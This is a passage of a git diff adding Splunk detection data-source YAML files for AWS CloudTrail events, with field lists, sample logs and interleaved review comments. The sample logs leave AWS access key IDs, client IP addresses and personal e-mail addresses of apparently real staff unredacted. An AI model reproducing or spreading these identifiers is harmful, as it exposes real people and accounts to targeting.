+ "bytesTransferredOut": 0}, "requestID": "1P8X27T2BCMY93Y9", "eventID": "25d92cd1-f366-4b11-b408-967a17ce70f3",
+ "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+ "ARN": "arn:aws:s3:::my-cloudtrail-bucket-alfsujjpnbpguqrh"}], "eventType": "AwsApiCall",
+ "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+ "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "clientProvidedHostHeader": "my-cloudtrail-bucket-alfsujjpnbpguqrh.s3.us-west-2.amazonaws.com"}}'
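Review bot: The `example_log` at the end of this hunk still carries an unredacted IAM access key ID (`AKIAYTOGP2RLKQ3U2PDY`) and a real-looking client address (`192.184.242.57`) even though `accountId` was already scrubbed to `111111111111`; the same holds for the PutBucketAcl sample above and for the PutBucketReplication, PutBucketVersioning, PutKeyPolicy, ReplaceNetworkAclEntry and SetDefaultPolicyVersion hunks below, where the key IDs, source IPs and personal e-mail addresses (`bpatel@splunk.com`, `daftpunk@splunk.com`, `pbareiss@splunk.local`) are also left in. A key ID without its secret is not directly usable, but it uniquely identifies a real principal, is exactly what secret scanners flag on a public repository, and the partial masking `ASIAYTOGP2RLAQ5VXXXX` in the versioning sample suggests redaction was intended. The PutImage hunk already uses the neutral placeholder `AAAAAAAAAAAAAAAAAAAAA` for `accessKeyId` and `principalId`; applying that placeholder consistently and swapping the IPs for a documentation range such as `203.0.113.10` keeps the samples fully usable for field extraction. These values live inside the single-quoted JSON string, so the change has no effect on how the YAML parses.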
diff --git a/data_sources/aws_cloudtrail_putbucketreplication.yml b/data_sources/aws_cloudtrail_putbucketreplication.yml
new file mode 100644
index 0000000000..b0863404ed
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketreplication.yml
@@ -0,0 +1,141 @@
+name: AWS CloudTrail PutBucketReplication
+id: 0e1362eb-e592-419f-8fa5-556d3a122417
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketReplication
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.ReplicationConfiguration.Role
+- requestParameters.ReplicationConfiguration.Rule.DeleteMarkerReplication.Status
+- requestParameters.ReplicationConfiguration.Rule.Destination.Bucket
+- requestParameters.ReplicationConfiguration.Rule.Filter
+- requestParameters.ReplicationConfiguration.Rule.ID
+- requestParameters.ReplicationConfiguration.Rule.Priority
+- requestParameters.ReplicationConfiguration.Rule.Status
+- requestParameters.ReplicationConfiguration.xmlns
+- requestParameters.bucketName
+- requestParameters.replication
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+- vpcEndpointId
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAYTOGP2RLDF6WP4H11:bpatel@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/bpatel@splunk.com",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLJOVYQHW2", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4H11", "arn":
+ "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+ "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+ "webIdFederationData": {}, "attributes": {"creationDate": "2023-04-24T23:45:42Z",
+ "mfaAuthenticated": "false"}}}, "eventTime": "2023-04-24T23:49:33Z", "eventSource":
+ "s3.amazonaws.com", "eventName": "PutBucketReplication", "awsRegion": "us-west-2",
+ "sourceIPAddress": "23.93.193.6", "userAgent": "[S3Console/0.4, aws-internal/3 aws-sdk-java/1.11.1030
+ Linux/5.4.238-155.347.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.362-b10 java/1.8.0_362
+ vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters": {"replication":
+ "", "bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com",
+ "ReplicationConfiguration": {"Role": "arn:aws:iam::111111111111:role/attack_range_bpatel",
+ "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/", "Rule": {"Status": "Enabled",
+ "Destination": {"Bucket": "arn:aws:s3:::badpublicbuckettest"}, "Filter": "", "Priority":
+ 0, "ID": "replication_x_test", "DeleteMarkerReplication": {"Status": "Disabled"}}}},
+ "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+ "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 416, "AuthenticationMethod":
+ "AuthHeader", "x-amz-id-2": "8UoliFe/sG2/v8qB2g763/g0Fy+kfaUqtKrzLHEILnHUisC3rL1dQfJ3NSIYcA/kzpIHQ955pGo=",
+ "bytesTransferredOut": 0}, "requestID": "14SAVMJNEJMTZN91", "eventID": "fbe079d1-bc6b-4ee0-8893-d2b412c5550f",
+ "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+ "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent":
+ true, "recipientAccountId": "111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory":
+ "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
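Review bot: The `fields` list here includes `eventtype`, `tag` and `tag::eventtype`, which are absent from the PutBucketLifecycle and PutBucketVersioning data sources added in this same commit although all three share `sourcetype: aws:cloudtrail` and the same add-on; PutKeyPolicy, ReplaceNetworkAclEntry and SetDefaultPolicyVersion list them again. These three names look like Splunk-side enrichment from the add-on's eventtype/tag configuration rather than keys of the raw CloudTrail event, which is presumably why they surface in some captures and not others, but the inconsistency will matter if contentctl validates a detection's fields against this list. Either add the three entries to every `aws:cloudtrail` data source or drop them from all of them, and record the decision with a comment above the list such as `# eventtype/tag fields come from the add-on's knowledge objects, not from the event payload`.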
diff --git a/data_sources/aws_cloudtrail_putbucketversioning.yml b/data_sources/aws_cloudtrail_putbucketversioning.yml
new file mode 100644
index 0000000000..32c9cfd1d1
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putbucketversioning.yml
@@ -0,0 +1,129 @@
+name: AWS CloudTrail PutBucketVersioning
+id: 17b2fc7d-c8ce-487c-8815-f9a65a09e980
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutBucketVersioning
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object
+- object_category
+- object_id
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.VersioningConfiguration.Status
+- requestParameters.VersioningConfiguration.xmlns
+- requestParameters.bucketName
+- requestParameters.versioning
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+- vpcEndpointId
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAYTOGP2RLDF6WP4HD6:daftpunk@splunk.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/daftpunk@splunk.com",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLAQ5VXXXX", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WP4HD6", "arn":
+ "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f",
+ "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"},
+ "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-04T15:18:37Z",
+ "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-04T15:19:25Z", "eventSource":
+ "s3.amazonaws.com", "eventName": "PutBucketVersioning", "awsRegion": "us-west-2",
+ "sourceIPAddress": "73.57.168.38", "userAgent": "[S3Console/0.4, aws-internal/3
+ aws-sdk-java/1.11.1030 Linux/5.4.196-119.356.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08
+ java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/standard]", "requestParameters":
+ {"bucketName": "git-wild-hunt-results", "Host": "s3.us-west-2.amazonaws.com", "versioning":
+ "", "VersioningConfiguration": {"Status": "Suspended", "xmlns": "http://s3.amazonaws.com/doc/2006-03-01/"}},
+ "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+ "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 125, "AuthenticationMethod":
+ "AuthHeader", "x-amz-id-2": "F3tJSu/C2DMkRNLldcWTRzApxQa6v197ImcuQDA++vaeaLj9UvcIkEFgDIrMYUdXLI4t+Uih5hk=",
+ "bytesTransferredOut": 0}, "requestID": "5KXZDSNDYXWC8Q4M", "eventID": "42d7a97e-9d35-4c8e-8d0a-4a82d91aab55",
+ "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::S3::Bucket",
+ "ARN": "arn:aws:s3:::git-wild-hunt-results"}], "eventType": "AwsApiCall", "managementEvent":
+ true, "recipientAccountId": "111111111111", "vpcEndpointId": "vpce-a0d039c9", "eventCategory":
+ "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+ "clientProvidedHostHeader": "s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_putimage.yml b/data_sources/aws_cloudtrail_putimage.yml
new file mode 100644
index 0000000000..c7897407fb
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putimage.yml
@@ -0,0 +1,151 @@
+name: AWS CloudTrail PutImage
+id: bb13f10d-0d8c-4fde-9136-b7cfd930e87c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutImage
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.imageManifest
+- requestParameters.imageManifestMediaType
+- requestParameters.imageTag
+- requestParameters.registryId
+- requestParameters.repositoryName
+- resources{}.ARN
+- resources{}.accountId
+- responseElements.image.imageId.imageDigest
+- responseElements.image.imageId.imageTag
+- responseElements.image.imageManifest
+- responseElements.image.imageManifestMediaType
+- responseElements.image.registryId
+- responseElements.image.repositoryName
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.invokedBy
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+ "AAAAAAAAAAAAAAAAAAAAA", "arn": "arn:aws:iam::111111111111:user/test", "accountId":
+ "111111111111", "accessKeyId": "AAAAAAAAAAAAAAAAAAAAA", "userName": "test", "sessionContext":
+ {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate":
+ "2021-08-18T23:15:39Z", "mfaAuthenticated": "false"}}, "invokedBy": "AWS Internal"},
+ "eventTime": "2021-08-18T23:17:30Z", "eventSource": "ecr.amazonaws.com", "eventName":
+ "PutImage", "awsRegion": "eu-central-1", "sourceIPAddress": "AWS Internal", "userAgent":
+ "AWS Internal", "requestParameters": {"registryId": "111111111112", "repositoryName":
+ "devsecops/cat_dog_server", "imageManifest": "{\n \"schemaVersion\": 2,\n \"mediaType\":
+ \"application/vnd.docker.distribution.manifest.v2+json\",\n \"config\": {\n \"mediaType\":
+ \"application/vnd.docker.container.image.v1+json\",\n \"size\": 6591,\n \"digest\":
+ \"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n },\n \"layers\":
+ [\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\":
+ 2811969,\n \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 35426616,\n \"digest\":
+ \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2347076,\n \"digest\":
+ \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 280,\n \"digest\":
+ \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 92,\n \"digest\":
+ \"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 373,\n \"digest\":
+ \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2383293,\n \"digest\":
+ \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 10001,\n \"digest\":
+ \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n }\n ]\n}",
+ "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json",
+ "imageTag": "latest"}, "responseElements": {"image": {"registryId": "111111111112",
+ "repositoryName": "devsecops/cat_dog_server", "imageId": {"imageDigest": "sha256:b7798f35949cc1a2d435c9ac59ab69e857fe635a359c96e4f56a8498ce02019c",
+ "imageTag": "latest"}, "imageManifest": "{\n \"schemaVersion\": 2,\n \"mediaType\":
+ \"application/vnd.docker.distribution.manifest.v2+json\",\n \"config\": {\n \"mediaType\":
+ \"application/vnd.docker.container.image.v1+json\",\n \"size\": 6591,\n \"digest\":
+ \"sha256:547fc07c53533763d68ebdfdc45529b1db45301d07824410bcc30df866d67df1\"\n },\n \"layers\":
+ [\n {\n \"mediaType\": \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\":
+ 2811969,\n \"digest\": \"sha256:540db60ca9383eac9e418f78490994d0af424aab7bf6d0e47ac8ed4e2e9bcbba\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 35426616,\n \"digest\":
+ \"sha256:f4fa1ac42c97abe89e0cc807af0ae4b63fbec2a5209a75a7239d099702c7fd80\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2347076,\n \"digest\":
+ \"sha256:2b3e10d0c87c453eed1378e102ff1cc17aa4e3eed2159b7505959777a6225059\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 280,\n \"digest\":
+ \"sha256:43bd2fc3ba418e309449b8c82d723d9069ebb81863050dc0d6ad6e6ec0683808\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 92,\n \"digest\":
+ \"sha256:803d6b58954d4daee18ed071281627f8214f3d2ba1b9a419ab8834029310942a\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 373,\n \"digest\":
+ \"sha256:e664d5491b5c81e901a2293fbc025532a7cae0dcc75ce7418f854209aaa2474c\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 2383293,\n \"digest\":
+ \"sha256:b827c586a783ce490b79907607d535f99f42360b6ba86a4b2ac3e7f01542144d\"\n },\n {\n \"mediaType\":
+ \"application/vnd.docker.image.rootfs.diff.tar.gzip\",\n \"size\": 10001,\n \"digest\":
+ \"sha256:0dd85ef396bcaded88fab4a8079d6b8bd5e3f8cf7eeb9b93306ffdb63401ba0a\"\n }\n ]\n}",
+ "imageManifestMediaType": "application/vnd.docker.distribution.manifest.v2+json"}},
+ "requestID": "805a31e6-0fed-433b-b393-f463c6881334", "eventID": "1aef3588-ae84-4f1f-9276-8ec94ee6a7e9",
+ "readOnly": false, "resources": [{"accountId": "111111111111", "ARN": "arn:aws:ecr:eu-central-1:1111111111111:repository/devsecops/cat_dog_server"}],
+ "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111",
+ "eventCategory": "Management"}'
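Review bot: The ECR ARN in the `resources` entry of this example (`arn:aws:ecr:eu-central-1:1111111111111:repository/devsecops/cat_dog_server`) has a 13-digit account segment while the adjacent `accountId` and every other account reference in the sample is the 12-digit `111111111111`. AWS account IDs are always 12 digits, so this looks like a slip during redaction and makes the sample's `resources{}.ARN` and `resources{}.accountId` disagree; the line should read `"ARN": "arn:aws:ecr:eu-central-1:111111111111:repository/devsecops/cat_dog_server"`. The `registryId` of `111111111112` differs from the caller's account as well, which may be a deliberate cross-account push, but if it is not it should be normalised at the same time.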
diff --git a/data_sources/aws_cloudtrail_putkeypolicy.yml b/data_sources/aws_cloudtrail_putkeypolicy.yml
new file mode 100644
index 0000000000..eea4b02dda
--- /dev/null
+++ b/data_sources/aws_cloudtrail_putkeypolicy.yml
@@ -0,0 +1,132 @@
+name: AWS CloudTrail PutKeyPolicy
+id: 9c54c86b-43b9-4bb8-915d-6838beb7f07c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail PutKeyPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.bypassPolicyLockoutSafetyCheck
+- requestParameters.keyId
+- requestParameters.policy
+- requestParameters.policyName
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+ "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local",
+ "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext":
+ {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn":
+ "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName":
+ "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated":
+ "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T11:04:39Z",
+ "eventSource": "kms.amazonaws.com", "eventName": "PutKeyPolicy", "awsRegion": "us-west-2",
+ "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893
+ Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10
+ java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1",
+ "policyName": "default", "policy": "{\n \"Version\": \"2012-10-17\",\n \"Id\":
+ \"key-consolepolicy-3\",\n \"Statement\": [\n {\n \"Sid\":
+ \"Enable IAM User Permissions\",\n \"Effect\": \"Allow\",\n \"Principal\":
+ {\n \"AWS\": \"arn:aws:iam::111111111111:root\"\n },\n \"Action\":
+ \"kms:*\",\n \"Resource\": \"*\"\n },\n {\n \"Sid\":
+ \"Allow access for Key Administrators\",\n \"Effect\": \"Allow\",\n \"Principal\":
+ {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\":
+ [\n \"kms:Create*\",\n \"kms:Describe*\",\n \"kms:Enable*\",\n \"kms:List*\",\n \"kms:Put*\",\n \"kms:Update*\",\n \"kms:Revoke*\",\n \"kms:Disable*\",\n \"kms:Get*\",\n \"kms:Delete*\",\n \"kms:TagResource\",\n \"kms:UntagResource\",\n \"kms:ScheduleKeyDeletion\",\n \"kms:CancelKeyDeletion\"\n ],\n \"Resource\":
+ \"*\"\n },\n {\n \"Sid\": \"Allow use of the key\",\n \"Effect\":
+ \"Allow\",\n \"Principal\": {\n \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\":
+ [\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n \"Resource\":
+ \"*\"\n },\n {\n \"Sid\": \"Allow attachment of persistent
+ resources\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\":
+ \"arn:aws:iam::111111111111:user/patrick_cli\"\n },\n \"Action\":
+ [\n \"kms:CreateGrant\",\n \"kms:ListGrants\",\n \"kms:RevokeGrant\"\n ],\n \"Resource\":
+ \"*\",\n \"Condition\": {\n \"Bool\": {\n \"kms:GrantIsForAWSResource\":
+ \"true\"\n }\n }\n },\n {\n \"Sid\":
+ \"Allow use of the key\",\n \"Effect\": \"Allow\",\n \"Principal\":
+ {\n \"AWS\": \"*\"\n },\n \"Action\": [\n \"kms:Encrypt\"\n ],\n \"Resource\":
+ \"*\"\n }\n ]\n}", "bypassPolicyLockoutSafetyCheck": false}, "responseElements":
+ null, "requestID": "c7836c7a-ca95-47aa-a3fb-a7db0d66fec8", "eventID": "612f17e3-2317-4dd9-8aa3-393bc8a7961b",
+ "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::KMS::Key",
+ "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}],
+ "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management",
+ "recipientAccountId": "111111111111"}'
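Review bot: `requestParameters.policy` is the only entry under which the KMS key policy appears in `fields`, and the example shows why: the policy arrives as a JSON document serialised into a string, so its `Statement`, `Principal` and `Action` members are not extracted as separate fields. That is worth stating next to the field, because the sample itself contains the kind of condition a detection would look for (a statement granting `kms:Encrypt` to `"Principal": {"AWS": "*"}`) and a search author reading this list might expect dotted sub-fields to exist. A one-line comment above the entry would save that confusion, e.g. `# policy is the full key policy as a JSON string; its statements are not separately extracted`.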
diff --git a/data_sources/aws_cloudtrail_replacenetworkaclentry.yml b/data_sources/aws_cloudtrail_replacenetworkaclentry.yml
new file mode 100644
index 0000000000..a507126200
--- /dev/null
+++ b/data_sources/aws_cloudtrail_replacenetworkaclentry.yml
@@ -0,0 +1,118 @@
+name: AWS CloudTrail ReplaceNetworkAclEntry
+id: db0c240e-3754-40e4-86ef-cde018ee9f65
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail ReplaceNetworkAclEntry
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+ url: https://splunkbase.splunk.com/app/1876
+ version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- direction
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- protocol
+- protocol_code
